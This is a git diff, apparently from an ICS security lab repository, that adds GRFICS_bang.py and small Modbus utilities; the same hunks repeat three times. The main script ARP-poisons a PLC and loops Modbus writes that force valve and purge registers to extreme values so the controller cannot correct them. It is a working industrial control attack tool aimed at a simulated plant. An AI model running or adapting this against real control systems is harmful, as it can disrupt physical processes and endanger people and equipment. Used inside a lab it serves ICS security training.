diff --git a/modbus/GRFICS_bang.png b/modbus/GRFICS_bang.png new file mode 100755 index 0000000..78fe94c --- /dev/null +++ b/modbus/GRFICS_bang.png Binary files differ diff --git a/modbus/GRFICS_bang.png b/modbus/GRFICS_bang.png new file mode 100755 index 0000000..78fe94c --- /dev/null +++ b/modbus/GRFICS_bang.png Binary files differ diff --git a/modbus/GRFICS_bang.py b/modbus/GRFICS_bang.py new file mode 100644 index 0000000..6ab6e0d --- /dev/null +++ b/modbus/GRFICS_bang.py @@ -0,0 +1,108 @@ +#!/usr/bin/env python + +""" +File: GRFICS_bang.py +Desc: Set the registers to values wanted and ARP poison the PLC so it can't correct. +""" +__author__ = '0xRoM' +from scapy.all import Ether, ARP, srp, send +from pyModbusTCP.client import ModbusClient +from multiprocessing import Process +import time +import sys +import os + +def _enable_linux_iproute(): + """ + Enables IP route ( IP Forward ) in linux-based distro + """ + os.system('echo 1 > /proc/sys/net/ipv4/ip_forward') + +def get_mac(ip): + """ + Returns MAC address of any device connected to the network + If ip is down, returns None instead + """ + ans, _ = srp(Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip), timeout=3, verbose=0) + if ans: + return ans[0][1].src + +def spoof(target_ip, host_ip, verbose=True): + """ + Spoofs `target_ip` saying that we are `host_ip`. + it is accomplished by changing the ARP cache of the target (poisoning) + """ + # get the mac address of the target + target_mac = get_mac(target_ip) + # craft the arp 'is-at' operation packet, in other words; an ARP response + # we don't specify 'hwsrc' (source MAC address) + # because by default, 'hwsrc' is the real MAC address of the sender (ours) + arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, op='is-at') + # send the packet + # verbose = 0 means that we send the packet without printing any thing + send(arp_response, verbose=0) + if verbose: + # get the MAC address of the default interface we are using + self_mac = ARP().hwsrc + print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, self_mac)) + +def restore(target_ip, host_ip, verbose=True): + """ + Restores the normal process of a regular network + This is done by sending the original informations + (real IP and MAC of `host_ip` ) to `target_ip` + """ + # get the real MAC address of target + target_mac = get_mac(target_ip) + # get the real MAC address of spoofed (gateway, i.e router) + host_mac = get_mac(host_ip) + # crafting the restoring packet + arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, hwsrc=host_mac) + # sending the restoring packet + # to restore the network to its normal process + # we send each reply seven times for a good measure (count=7) + send(arp_response, verbose=0, count=7) + if verbose: + print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, host_mac)) + +def spoof_wrapper(): + while True: + spoof(arp_target, arp_host, verbose) + +arp_target = "192.168.95.2" +arp_host = "192.168.95.1" +verbose = False +_enable_linux_iproute() + +try: + p = Process(target=spoof_wrapper) + p.start() + #p.join() # wait for it to finish! *yuk* + + while True: + + # set A + client=ModbusClient(host="192.168.95.10",port=502,auto_open=True,auto_close=True,timeout=10) + client.write_single_register(1,65535) + client.close() + + # set B + client=ModbusClient(host="192.168.95.11",port=502,auto_open=True,auto_close=True,timeout=10) + client.write_single_register(1,65535) + client.close() + + # set purge + client=ModbusClient(host="192.168.95.12",port=502,auto_open=True,auto_close=True,timeout=10) + client.write_single_register(1,0) + client.close() + + # set product + client=ModbusClient(host="192.168.95.13",port=502,auto_open=True,auto_close=True,timeout=10) + client.write_single_register(1,0) + client.close() + + #time.sleep(0.2) + +except KeyboardInterrupt: + print("[!] Detected CTRL+C ! restoring the network, please wait...") + restore(arp_target, arp_host) diff --git a/modbus/GRFICS_bang.png b/modbus/GRFICS_bang.png new file mode 100755 index 0000000..78fe94c --- /dev/null +++ b/modbus/GRFICS_bang.png Binary files differ diff --git a/modbus/GRFICS_bang.py b/modbus/GRFICS_bang.py new file mode 100644 index 0000000..6ab6e0d --- /dev/null +++ b/modbus/GRFICS_bang.py @@ -0,0 +1,108 @@ +#!/usr/bin/env python + +""" +File: GRFICS_bang.py +Desc: Set the registers to values wanted and ARP poison the PLC so it can't correct. +""" +__author__ = '0xRoM' +from scapy.all import Ether, ARP, srp, send +from pyModbusTCP.client import ModbusClient +from multiprocessing import Process +import time +import sys +import os + +def _enable_linux_iproute(): + """ + Enables IP route ( IP Forward ) in linux-based distro + """ + os.system('echo 1 > /proc/sys/net/ipv4/ip_forward') + +def get_mac(ip): + """ + Returns MAC address of any device connected to the network + If ip is down, returns None instead + """ + ans, _ = srp(Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip), timeout=3, verbose=0) + if ans: + return ans[0][1].src + +def spoof(target_ip, host_ip, verbose=True): + """ + Spoofs `target_ip` saying that we are `host_ip`. + it is accomplished by changing the ARP cache of the target (poisoning) + """ + # get the mac address of the target + target_mac = get_mac(target_ip) + # craft the arp 'is-at' operation packet, in other words; an ARP response + # we don't specify 'hwsrc' (source MAC address) + # because by default, 'hwsrc' is the real MAC address of the sender (ours) + arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, op='is-at') + # send the packet + # verbose = 0 means that we send the packet without printing any thing + send(arp_response, verbose=0) + if verbose: + # get the MAC address of the default interface we are using + self_mac = ARP().hwsrc + print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, self_mac)) + +def restore(target_ip, host_ip, verbose=True): + """ + Restores the normal process of a regular network + This is done by sending the original informations + (real IP and MAC of `host_ip` ) to `target_ip` + """ + # get the real MAC address of target + target_mac = get_mac(target_ip) + # get the real MAC address of spoofed (gateway, i.e router) + host_mac = get_mac(host_ip) + # crafting the restoring packet + arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, hwsrc=host_mac) + # sending the restoring packet + # to restore the network to its normal process + # we send each reply seven times for a good measure (count=7) + send(arp_response, verbose=0, count=7) + if verbose: + print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, host_mac)) + +def spoof_wrapper(): + while True: + spoof(arp_target, arp_host, verbose) + +arp_target = "192.168.95.2" +arp_host = "192.168.95.1" +verbose = False +_enable_linux_iproute() + +try: + p = Process(target=spoof_wrapper) + p.start() + #p.join() # wait for it to finish! *yuk* + + while True: + + # set A + client=ModbusClient(host="192.168.95.10",port=502,auto_open=True,auto_close=True,timeout=10) + client.write_single_register(1,65535) + client.close() + + # set B + client=ModbusClient(host="192.168.95.11",port=502,auto_open=True,auto_close=True,timeout=10) + client.write_single_register(1,65535) + client.close() + + # set purge + client=ModbusClient(host="192.168.95.12",port=502,auto_open=True,auto_close=True,timeout=10) + client.write_single_register(1,0) + client.close() + + # set product + client=ModbusClient(host="192.168.95.13",port=502,auto_open=True,auto_close=True,timeout=10) + client.write_single_register(1,0) + client.close() + + #time.sleep(0.2) + +except KeyboardInterrupt: + print("[!] Detected CTRL+C ! restoring the network, please wait...") + restore(arp_target, arp_host) diff --git a/modbus/set_coil.py b/modbus/set_coil.py index 02ab399..82acd15 100644 --- a/modbus/set_coil.py +++ b/modbus/set_coil.py @@ -24,6 +24,7 @@ client.write_single_coil(args.coil,True) else: client.write_single_coil(args.coil,False) +client.close() if args.loop: i=1 diff --git a/modbus/GRFICS_bang.png b/modbus/GRFICS_bang.png new file mode 100755 index 0000000..78fe94c --- /dev/null +++ b/modbus/GRFICS_bang.png Binary files differ diff --git a/modbus/GRFICS_bang.py b/modbus/GRFICS_bang.py new file mode 100644 index 0000000..6ab6e0d --- /dev/null +++ b/modbus/GRFICS_bang.py @@ -0,0 +1,108 @@ +#!/usr/bin/env python + +""" +File: GRFICS_bang.py +Desc: Set the registers to values wanted and ARP poison the PLC so it can't correct. +""" +__author__ = '0xRoM' +from scapy.all import Ether, ARP, srp, send +from pyModbusTCP.client import ModbusClient +from multiprocessing import Process +import time +import sys +import os + +def _enable_linux_iproute(): + """ + Enables IP route ( IP Forward ) in linux-based distro + """ + os.system('echo 1 > /proc/sys/net/ipv4/ip_forward') + +def get_mac(ip): + """ + Returns MAC address of any device connected to the network + If ip is down, returns None instead + """ + ans, _ = srp(Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip), timeout=3, verbose=0) + if ans: + return ans[0][1].src + +def spoof(target_ip, host_ip, verbose=True): + """ + Spoofs `target_ip` saying that we are `host_ip`. + it is accomplished by changing the ARP cache of the target (poisoning) + """ + # get the mac address of the target + target_mac = get_mac(target_ip) + # craft the arp 'is-at' operation packet, in other words; an ARP response + # we don't specify 'hwsrc' (source MAC address) + # because by default, 'hwsrc' is the real MAC address of the sender (ours) + arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, op='is-at') + # send the packet + # verbose = 0 means that we send the packet without printing any thing + send(arp_response, verbose=0) + if verbose: + # get the MAC address of the default interface we are using + self_mac = ARP().hwsrc + print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, self_mac)) + +def restore(target_ip, host_ip, verbose=True): + """ + Restores the normal process of a regular network + This is done by sending the original informations + (real IP and MAC of `host_ip` ) to `target_ip` + """ + # get the real MAC address of target + target_mac = get_mac(target_ip) + # get the real MAC address of spoofed (gateway, i.e router) + host_mac = get_mac(host_ip) + # crafting the restoring packet + arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, hwsrc=host_mac) + # sending the restoring packet + # to restore the network to its normal process + # we send each reply seven times for a good measure (count=7) + send(arp_response, verbose=0, count=7) + if verbose: + print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, host_mac)) + +def spoof_wrapper(): + while True: + spoof(arp_target, arp_host, verbose) + +arp_target = "192.168.95.2" +arp_host = "192.168.95.1" +verbose = False +_enable_linux_iproute() + +try: + p = Process(target=spoof_wrapper) + p.start() + #p.join() # wait for it to finish! *yuk* + + while True: + + # set A + client=ModbusClient(host="192.168.95.10",port=502,auto_open=True,auto_close=True,timeout=10) + client.write_single_register(1,65535) + client.close() + + # set B + client=ModbusClient(host="192.168.95.11",port=502,auto_open=True,auto_close=True,timeout=10) + client.write_single_register(1,65535) + client.close() + + # set purge + client=ModbusClient(host="192.168.95.12",port=502,auto_open=True,auto_close=True,timeout=10) + client.write_single_register(1,0) + client.close() + + # set product + client=ModbusClient(host="192.168.95.13",port=502,auto_open=True,auto_close=True,timeout=10) + client.write_single_register(1,0) + client.close() + + #time.sleep(0.2) + +except KeyboardInterrupt: + print("[!] Detected CTRL+C ! restoring the network, please wait...") + restore(arp_target, arp_host) diff --git a/modbus/set_coil.py b/modbus/set_coil.py index 02ab399..82acd15 100644 --- a/modbus/set_coil.py +++ b/modbus/set_coil.py @@ -24,6 +24,7 @@ client.write_single_coil(args.coil,True) else: client.write_single_coil(args.coil,False) +client.close() if args.loop: i=1 diff --git a/modbus/set_reg.py b/modbus/set_reg.py new file mode 100644 index 0000000..f3607c5 --- /dev/null +++ b/modbus/set_reg.py @@ -0,0 +1,36 @@ +#!/usr/bin/env python + +""" +File: set_reg.py +Desc: set a specific register to a specific value +""" +__author__ = '0xRoM' +from argparse import ArgumentParser, ArgumentTypeError +from pyModbusTCP.client import ModbusClient +import time +import sys + +parser = ArgumentParser() +parser.add_argument('-i','--ipaddress', action='store', type=str, required=True, help='Input IP Address') +parser.add_argument('-p','--port', action='store', type=int, required=False, help='Port Number', default=502) +parser.add_argument('-r','--reg', action='store', type=int, required=True, help='Register Number', default=0) +parser.add_argument('-v','--val', action='store', type=int, required=True, help='Register Value', default=0) +parser.add_argument('-l','--loop', action='store_true', required=False, help='loop on') +parser.add_argument('-t','--timeout', action='store', type=float, required=False, help='request every X seconds', default=2) +args = parser.parse_args() + +client=ModbusClient(host=args.ipaddress,port=args.port,auto_open=True,auto_close=True,timeout=10) +client.write_single_register(args.reg,args.val) +client.close() + +if args.loop: + i=1 + while True: + client=ModbusClient(host=args.ipaddress,port=args.port,auto_open=True,auto_close=True,timeout=10) + client.write_single_register(args.reg,args.val) + client.close() + print '\r>>packet: %d' % i, + sys.stdout.flush() + i+=1 + time.sleep(args.timeout) +